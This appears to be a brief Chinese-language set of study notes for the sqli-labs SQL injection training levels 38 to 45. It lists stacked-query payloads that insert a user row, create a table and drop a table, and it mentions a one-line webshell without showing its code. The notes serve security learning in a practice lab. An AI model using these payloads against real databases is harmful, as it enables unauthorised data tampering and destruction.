image.png

    less-38
    http://127.0.0.1/sqli-labs-master/Less-38/?id=1’;insert into users(id,username,password)values(“56”,”ssss”,”222”)—+
    less-39—-less-41基本相同

    less-42

    image.png

    对密码进行注入
    a
    a’; create table sus like users; #

    less-43
    a
    a’); create table sus like users; #
    a’); drop table sus ; #

    less-44
    本关是基于盲注的,这里盲注主要是要没有报错信息,所以要采用盲注。这关与42关的区
    别就在于没有报错信息,
    a
    a’; create table sus like users; #

    less-45
    盲注
    a
    a’; create table sus like users; #

    一句话木马
    image.png